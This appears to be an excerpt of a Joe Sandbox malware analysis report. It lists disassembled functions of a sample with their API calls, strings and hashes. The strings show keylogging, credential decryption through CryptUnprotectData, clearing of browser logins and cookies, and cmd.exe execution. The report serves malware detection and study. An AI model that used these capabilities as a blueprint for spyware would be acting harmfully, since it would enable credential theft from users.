                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventLocalTimewsprintf
                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                • API String ID: 1497725170-1359877963
                                • Opcode ID: 146ec40d80975ce460983ba45166e756595be86b93ab3a07005c0417d446001b
                                • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                • Opcode Fuzzy Hash: 146ec40d80975ce460983ba45166e756595be86b93ab3a07005c0417d446001b
                                • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTime$wsprintf
                                • String ID: Online Keylogger Started
                                • API String ID: 112202259-1258561607
                                • Opcode ID: 18c80faa916e37ff587b460602bbba5bb4c1a333ebe42aa4448383553abdc9cc
                                • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                • Opcode Fuzzy Hash: 18c80faa916e37ff587b460602bbba5bb4c1a333ebe42aa4448383553abdc9cc
                                • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CloseHandle.KERNEL32(00000000,00000000,0040F3BB,?,0044BC8A,0040F3BB,0046EBB0,0000000C), ref: 0044BDC2
                                • GetLastError.KERNEL32(?,0044BC8A,0040F3BB,0046EBB0,0000000C), ref: 0044BDCC
                                • __dosmaperr.LIBCMT ref: 0044BDF7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseErrorHandleLast__dosmaperr
                                • String ID: H\k
                                • API String ID: 2583163307-1302769634
                                • Opcode ID: c386fb262ac1df75f9233a8cbac1a47ba8a32ae4ab5a4414f4170ecae5b11561
                                • Instruction ID: 6d8ae8a68538518658f59cc4ec35c635b4eb055c917d93d15d596e37dde74a72
                                • Opcode Fuzzy Hash: c386fb262ac1df75f9233a8cbac1a47ba8a32ae4ab5a4414f4170ecae5b11561
                                • Instruction Fuzzy Hash: 59010832A0426066E62462399C4577F6749CB92739F2546AFFD14872D3DB6CCC8182D9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: CryptUnprotectData$crypt32
                                • API String ID: 2574300362-2380590389
                                • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                • SetEvent.KERNEL32(?), ref: 004051D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandleObjectSingleWait
                                • String ID: Connection Timeout
                                • API String ID: 2055531096-499159329
                                • Opcode ID: b2d32d1c486696acff87f5af967792298d31230c8842a0f6a1d2fc38208b6c67
                                • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                • Opcode Fuzzy Hash: b2d32d1c486696acff87f5af967792298d31230c8842a0f6a1d2fc38208b6c67
                                • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 2005118841-1866435925
                                • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041381F
                                • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,Pj), ref: 0041384D
                                • RegCloseKey.ADVAPI32(?,?,0040F823,pth_unenc,Pj), ref: 00413858
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: pth_unenc
                                • API String ID: 1818849710-4028850238
                                • Opcode ID: 05bf175528813bc9b9993d83c1793f80e43b850aacd1f889012fd8a578c3b476
                                • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                • Opcode Fuzzy Hash: 05bf175528813bc9b9993d83c1793f80e43b850aacd1f889012fd8a578c3b476
                                • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                • String ID: bad locale name
                                • API String ID: 3628047217-1405518554
                                • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                • ShowWindow.USER32(00000009), ref: 00416C61
                                • SetForegroundWindow.USER32 ref: 00416C6D
                                  • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                  • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                  • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                  • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                • String ID: !D@
                                • API String ID: 186401046-604454484
                                • Opcode ID: 2b91b2f08cb42d6db95f8e8b14237b809d5a14eb7cc4a15ba04d3927bf9cc9fe
                                • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                • Opcode Fuzzy Hash: 2b91b2f08cb42d6db95f8e8b14237b809d5a14eb7cc4a15ba04d3927bf9cc9fe
                                • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: /C $cmd.exe$open
                                • API String ID: 587946157-3896048727
                                • Opcode ID: 4ad490e0fde3b647c583a86c80413934cd69158f8dfa8dfee57c8354f6faf088
                                • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                • Opcode Fuzzy Hash: 4ad490e0fde3b647c583a86c80413934cd69158f8dfa8dfee57c8354f6faf088
                                • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alldvrm$_strrchr
                                • String ID:
                                • API String ID: 1036877536-0
                                • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                • API String ID: 3472027048-1236744412
                                • Opcode ID: 124cb6de9c263eed82a237a43c98a4d15d006963f6995f73d2f5d0000a7b7099
                                • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                • Opcode Fuzzy Hash: 124cb6de9c263eed82a237a43c98a4d15d006963f6995f73d2f5d0000a7b7099
                                • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                  • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                  • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                • Sleep.KERNEL32(000001F4), ref: 0040A573
                                • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$ForegroundLength
                                • String ID: [ $ ]
                                • API String ID: 3309952895-93608704
                                • Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                • Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
                                • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 3919263394-0
                                • Opcode ID: b5e3200c466b265101f42b470097a5df982af49012dad84e5cfda8818ecad7ff
                                • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                • Opcode Fuzzy Hash: b5e3200c466b265101f42b470097a5df982af49012dad84e5cfda8818ecad7ff
                                • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                  • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                • _UnwindNestedFrames.LIBCMT ref: 00439891
                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                • String ID:
                                • API String ID: 2633735394-0
                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                • GetSystemMetrics.USER32(0000004F), ref: 00419402
